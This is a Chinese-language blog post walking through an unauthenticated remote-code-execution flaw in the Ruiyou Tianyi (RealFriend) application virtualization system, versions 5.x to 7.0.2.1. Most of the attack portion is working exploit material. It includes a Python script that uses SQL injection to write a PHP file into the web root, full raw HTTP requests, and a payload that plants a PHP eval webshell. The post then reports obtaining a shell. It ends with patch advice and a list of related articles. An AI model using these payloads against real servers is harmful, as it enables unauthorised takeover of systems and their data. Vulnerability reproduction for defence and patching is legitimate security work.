瑞友天翼应用虚拟化系统RCE漏洞复现+利用
1、产品简介
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。
2、漏洞概述
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)
3、影响范围
影响版本
5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
不受影响版本
瑞友天翼应用虚拟化系统 >= 7.0.3.1
4、复现环境
Windows10搭建6.0.5.1漏洞版本
安装包: https://pan.baidu.com/s/17Y2nZFnvwXbxA1ACt06sLw 提取码: kymc
一直默认下一步,安装好重启电脑即可
通过/RapAgent.xgi?CMD=GetRegInfo查看漏洞环境版本
5、漏洞复现
漏洞检测脚本:
'''
SQL注入-->RCE EXP
瑞友天翼应用虚拟化系统RCE漏洞
影响版本
5.x<=version<=7.0.2.1
安全版本
version>=7.0.3.1
'''import requests
import sysurl = sys.argv[1]
payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"
repose = requests.get(url=url+payload)
if repose.status_code ==200:a = url + '1.php'b = requests.get(url=a)if b.status_code == 200:print('[+] 漏洞存在,验证地址: {}1.php '.format(url))
原理:利用已知poc,通过sql注入写入php文件 ,内容是phpinfo()(只对默认安装路径起作用,请根据环境自行修改payload中的路径)
效果如下:
手动复现
burp抓取首页包发送Reprater模块,构造payload进行复现
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: 192.168.189.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1
6、漏洞利用
尝试写入php一句话马子,需要对特殊符号进行url编码(经测试,漏洞环境过滤了单引号,需采用双引号或者使用hex编码bypass)
exp
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3c%3fphp+eval%28%24%5fPOST%5b%22cmd%22%5d%29%3b%3f%3e%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C5.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: 192.168.189.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1
写入的一句话马子,冰蝎和哥斯拉的也都可以,自行测试
成功获取shell
7、修复建议
目前官方已发布安全更新,建议受影响用户尽快更新至安全版本:
瑞友天翼应用虚拟化系统 V7.0.3.1
下载地址:http://soft.realor.cn:88/Gwt7.0.3.1.exe
非必要不建议将该系统暴露在公网。
瑞友天翼应用虚拟化系统RCE漏洞复现+利用相关推荐
- 瑞友天翼应用虚拟化系统存在远程代码执行漏洞
文章目录 瑞友天翼应用虚拟化系统存在远程代码执行漏洞 1. 瑞友天翼应用虚拟化系统简介 2.漏洞描述 3.影响版本 4.fofa 查询语句 5.漏洞复现 6.POC&EXP 7.整改意见 8. ...
- Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
漏洞名称: 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞 English Name:Ruiyou Tianyi Application Virtualization System ...
- 如何外网登录访问瑞友天翼应用虚拟化系统?——快解析内网端口映射方案
瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台.如何将内网平台提供到互联网上外网 ...
- 禅道项目管理系统RCE漏洞复现+利用
1.漏洞概述 禅道研发项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理.任务管理.bug管理.缺陷管理.用例管理.计划发布等功能,实现了软件的完整生命周期管理.2023年1月6日, ...
- 瑞友天翼虚拟化系统7.0 瑞友天翼远程接入
瑞友天翼虚拟化系统7.0 瑞友天翼远程接入软件永久使用,远程接入软件,服务端运行激活程序即可,无需修改客户端,客户端不显示演示版的,实现金蝶用友远程快速访问,不再每台客户机安装复杂的金蝶用友等客户端, ...
- 利用Go语言批量刷公益 瑞友天翼(1day)
前几天爆出的瑞友天翼1day还是比较很热门的,如果想挖公益的话那必然还是要扫描器批量的. go的线程众所周知,直接贴代码自己测试吧 fofa语句: ' product="REALOR-天 ...
- 瑞友天翼4.0在XP下安装注意事项
瑞友天翼4.0在XP下安装注意事项 此版本只支持Windows Xp Professinal SP2下安装.如果你的Xp不是SP2请按照一下方法修改操作系统,并安装Xp的SP2补丁包!+ o( f+ ...
- 瑞友客户端无法建立跟远程计算机的连接,瑞友天翼终端错误信息的原因以及解决方法大全.doc...
瑞友天翼终端错误信息的原因以及解决方法大全 终端错误信息的原因以及解决办法大全 由于在数据加密中存在错误,此会话将结束.请尝试重新连接到远程计算机. 原因: 数据加密为在网络连接上进行数据传输提供了安 ...
- 瑞友天翼远程接入平台的应用
案例介绍 某建材公司店面.财务部门.物流部门还有10几个分店面都在异地,需要互连互通,前期都是通过传真来实现数据交换的,数据传输速度慢,准确率低,实时性差,工作效率收到了严重的阻碍. 某建材公司是一家 ...
最新文章
- matplotlib绘制图表,设置刻度标签、最大最小刻度、字体大小,label位置、刻度轴箭头等
- 阶段1 语言基础+高级_1-3-Java语言高级_04-集合_05 List集合_1_List集合_介绍常用方法...
- AD5933不同频率下的转换结果
- html盒子阴影的语法,css3 盒阴影box-shadow
- python数字列表in_Python入门基础之数字字符串与列表
- UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)
- 对具有外部依赖的Angular服务类(service class)进行单元测试的几种方式
- c#中WepAPI(post/get)控制器方法创建和httpclient调用webAPI实例
- linux误删ssh不上,误删openssh-server删除,复原操作
- 兼容多浏览器的CSS背景透明
- 传奇衣服、翅膀、武器、怪物、NPC等外观代码计算方法与公式
- 2021年低压电工新版试题及低压电工考试总结
- JavaScript验证手机号码、电子邮箱格式
- Elasticsearch 使用同义词 二
- UEFI/GPT分区
- 智能城市dqn算法交通信号灯调度_滴滴张博:智慧交通大脑是支撑城市可持续发展的重要基础设施...
- 写给静不下心来的朋友们
- 百家号怎么出爆文?10W+爆文技巧,轻松运营百家号
- 索尼机型刷机不用愁 带你玩转一键解锁
- 巅峰对决:node.js和php性能测试